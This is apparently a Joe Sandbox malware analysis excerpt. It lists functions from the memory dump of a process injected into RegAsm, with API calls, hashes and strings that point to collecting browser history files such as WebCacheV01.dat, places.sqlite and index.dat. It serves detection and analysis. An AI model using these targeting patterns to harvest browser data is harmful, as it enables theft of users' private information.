                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmpqsort
                                                • String ID: /nosort$/sort
                                                • API String ID: 1579243037-1578091866
                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModuleProcessTimes
                                                • String ID: GetProcessTimes$kernel32.dll
                                                • API String ID: 116129598-3385500049
                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040E60F
                                                • memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                • API String ID: 2887208581-2114579845
                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                • API String ID: 2221118986-1725073988
                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcmp
                                                • String ID: $$8
                                                • API String ID: 1475443563-435121686
                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                • String ID:
                                                • API String ID: 1979745280-0
                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                • memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                • String ID: history.dat$places.sqlite
                                                • API String ID: 2641622041-467022611
                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                • GetLastError.KERNEL32 ref: 00417627
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$File$PointerRead
                                                • String ID:
                                                • API String ID: 839530781-0
                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID: *.*$index.dat
                                                • API String ID: 1974802433-2863569691
                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                • GetLastError.KERNEL32 ref: 004175A2
                                                • GetLastError.KERNEL32 ref: 004175A8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FilePointer
                                                • String ID:
                                                • API String ID: 1156039329-0
                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                • String ID:
                                                • API String ID: 1125800050-0
                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CloseHandleSleep
                                                • String ID: }A
                                                • API String ID: 252777609-2138825249
                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • malloc.MSVCRT ref: 00409A10
                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                • free.MSVCRT ref: 00409A31
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: freemallocmemcpy
                                                • String ID:
                                                • API String ID: 3056473165-0
                                                • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: BINARY
                                                • API String ID: 2221118986-907554435
                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                • _mbscat.MSVCRT ref: 0040525B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 568699880-0
                                                • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /stext
                                                • API String ID: 2081463915-3817206916
                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 1023896661-0
                                                • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 2445788494-0
                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
